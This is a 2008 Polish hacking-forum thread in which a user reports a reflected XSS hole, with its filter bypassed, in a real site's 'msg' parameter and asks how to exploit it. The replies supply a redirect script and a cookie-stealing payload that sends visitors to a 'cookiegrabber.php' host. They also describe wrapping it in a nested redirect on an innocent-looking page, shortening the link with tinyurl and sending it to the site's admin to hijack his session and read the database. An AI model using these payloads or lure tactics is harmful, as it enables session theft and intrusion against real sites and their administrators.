Pokaż wyniki 1 do 9 z 9

Temat: Jak wykorzysrać pewną lukę na stronie?

  1. #1
    Zarejestrowany
    Feb 2008
    Skąd
    Tu i tam
    Postów
    147

    Domyślnie Jak wykorzysrać pewną lukę na stronie?

    Dzień dobry

    Znalazłem pewną lukę w bezpieczeństwie pewnej strony, która jest dosyć dobrze zabezpieczona (https, itp :] ) Jednak ma jedną rzecz, którą można by było chyba wykorzystać:
    Po wpisaniu w adresie "https://tastrona.pl/index.php?msg=TA TRESC POJAWIA SIE NA STRONIE"
    Treść wpisana w zmiennej msg pojawia się na stronie, tak są pokazywane błędy. Ta część ma pewien filtr, który udało mi się ominąć tak że można użyć XSS. Tylko czy czy jest to naprawdę luka w bezpieczeństwie czy nie?Czy można to jakoś wykorzystać?

  2. #2
    Avatar Ormi
    Ormi jest offline %x-%x-%x-%n
    Zarejestrowany
    Jul 2008
    Skąd
    Za twoimi plecami
    Postów
    351

    Domyślnie

    Mozna tylko zdobyć ciasteczka użytkownika, ktory kliknie w odpowiedni link. Nic wiecej
    Black Coders | Hacking, Kernel, Linux, Operating Systems, Programming
    I otworzyła studnię Czeluści,
    a dym się uniósł ze studni jak dym z wielkiego pieca,
    i od dymu zaćmiło się słońce i powietrze.
    A z dymu wyszła szarańcza na ziemię,
    i dano jej moc jaką mają ziemskie skorpiony.
    (...)
    I dano jej nakaz aby nie zabijała,
    lecz aby przez pięć miesięcy cierpieli katusze...

  3. #3
    Avatar rafal44
    rafal44 jest offline logout
    Zarejestrowany
    Dec 2007
    Postów
    291

    Domyślnie

    Możesz przekierować użytkowników na inną stronę, np:
    Kod:
    <script>self.location.href='http://www.hack.pl';</script>
    "a imię jego będzie czterdzieści i cztery"
    A. Mickiewicz Dziady cz. III

  4. #4
    Avatar javaman
    javaman jest offline www.javainside.pl
    Zarejestrowany
    Mar 2008
    Skąd
    no przed monitorem przecież...
    Postów
    474

    Domyślnie

    nie jest to na pewno zagrożenie dla strony samej w sobie. Do włamki raczej tego nie "WYKORZYSRASZ"

  5. #5
    Zarejestrowany
    May 2007
    Skąd
    Kraków
    Postów
    371

    Domyślnie

    I wlanie dlatego uwazam atak XSS za nieprzydatny przy przejmowaniu serwera...

  6. #6
    Zarejestrowany
    Feb 2008
    Skąd
    Tu i tam
    Postów
    147

    Domyślnie

    Dziękuję bardzo za odpowiedź.

  7. #7
    Zarejestrowany
    Aug 2008
    Postów
    36

    Domyślnie

    Cytat Napisał Teeed Zobacz post
    I wlanie dlatego uwazam atak XSS za nieprzydatny przy przejmowaniu serwera...
    Hmm... nie wiem jak działa PHPMyAdmin albo inne systemy do zarządzania bazą danych ze strony, ale jeśli zalogowany admin wejdzie na stronę w której ktoś wykorzystał XSSa i wtedy ten ktoś wejdzie z session id admina to mógłby przejrzeć rekordy w bazie danych? :P
    Ostatnio edytowane przez edosinx : 10-30-2008 - 17:57
    "Czasem człowiek sądzi, że ujrzał już dno studni ludzkiej głupoty,
    ale spotyka kogoś, dzięki komu dowiaduje się,
    że ta studnia jednak nie ma dna."
    - Stephen King

  8. #8
    Avatar Ormi
    Ormi jest offline %x-%x-%x-%n
    Zarejestrowany
    Jul 2008
    Skąd
    Za twoimi plecami
    Postów
    351

    Domyślnie

    Chyba zależy od systemu zarządzania, ale zwykle tak. Tyle, że trzeba go zmusić do kliknięcia w odpowiedni link,a chyba żaden rozsądny admin nie kliknie w linkr w rodzaju jegostrona.pl/?co=<script>self.location="http://strona.pl/cookiegrabber.php"</script>
    Chyba, żeby to zrealizować tak:
    Na jakiejś swojej niewinnej stronce dać taki kod:
    <script>self.location="jegostrona.pl/?co=<script>self.location=\"http://strona.pl/cookiegrabber.php\"</script>"</script>
    W link do takiej strony podesłać adminowi
    Black Coders | Hacking, Kernel, Linux, Operating Systems, Programming
    I otworzyła studnię Czeluści,
    a dym się uniósł ze studni jak dym z wielkiego pieca,
    i od dymu zaćmiło się słońce i powietrze.
    A z dymu wyszła szarańcza na ziemię,
    i dano jej moc jaką mają ziemskie skorpiony.
    (...)
    I dano jej nakaz aby nie zabijała,
    lecz aby przez pięć miesięcy cierpieli katusze...

  9. #9
    Zarejestrowany
    Aug 2008
    Postów
    36

    Domyślnie

    Cytat Napisał Ormi Zobacz post
    Chyba zależy od systemu zarządzania, ale zwykle tak. Tyle, że trzeba go zmusić do kliknięcia w odpowiedni link,a chyba żaden rozsądny admin nie kliknie w linkr w rodzaju jegostrona.pl/?co=<script>self.location="http://strona.pl/cookiegrabber.php"</script>
    Chyba, żeby to zrealizować tak:
    Na jakiejś swojej niewinnej stronce dać taki kod:
    <script>self.location="jegostrona.pl/?co=<script>self.location=\"http://strona.pl/cookiegrabber.php\"</script>"</script>
    W link do takiej strony podesłać adminowi
    Ojoj, zapomniałem że ten XSS jest dopisywany do URLa Pisałem myśląc o błędzie XSS w komentarzu czy gdzieś gdzie dopiszemy i siedzi na stałe No tak, w takim razie trzeba wrzucić w tinyurl i podesłać na gg jak to nieraz można zauważyć dostając link do 'super strony z super muzą od koleżanki Ani/Kasi z podstawówki' :P

    A skoro już jesteśmy przy XSS i wykonywaniu JSa. Mogło mi się coś pomerdać, ale jestem prawie przekonany że pare lat temu, gdy jeszcze wielu rzeczy nie wiedziałem, zdarzało mi się czasem trafić na jakąś stronę, gdzie po samym wejściu instalowały mi się Dialery i inny szajs. Nie ściągałem żadnego oprogramowania, tylko wchodziłem i już zonk, komp zasyfiony. Jak było to zrobione? Jakieś luki w JS w przeglądarkach pozwalające wykonać dowolny kod?
    "Czasem człowiek sądzi, że ujrzał już dno studni ludzkiej głupoty,
    ale spotyka kogoś, dzięki komu dowiaduje się,
    że ta studnia jednak nie ma dna."
    - Stephen King

Podobne wątki

  1. zarabianie na stronie
    By 4ndr1u in forum Biznes internetowy
    Odpowiedzi: 4
    Autor: 09-10-2008, 08:12
  2. Złamanie hasła na stronie...
    By szymonkozak in forum /dev/null
    Odpowiedzi: 6
    Autor: 04-22-2008, 20:53
  3. Informacje ukryte na stronie
    By messiah in forum Newbie - dla początkujących!
    Odpowiedzi: 8
    Autor: 04-17-2008, 08:49
  4. Jak zdobyć hasło do poczty która się znajduje na stronie ...?
    By river-of-love in forum Newbie - dla początkujących!
    Odpowiedzi: 3
    Autor: 05-08-2007, 13:58
  5. HACK.pl wykryło krytyczną lukę serwerów home.pl
    By [S.e.M.e.N] in forum Aktualności / Felietony / Artykuły
    Odpowiedzi: 98
    Autor: 04-14-2007, 23:20

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj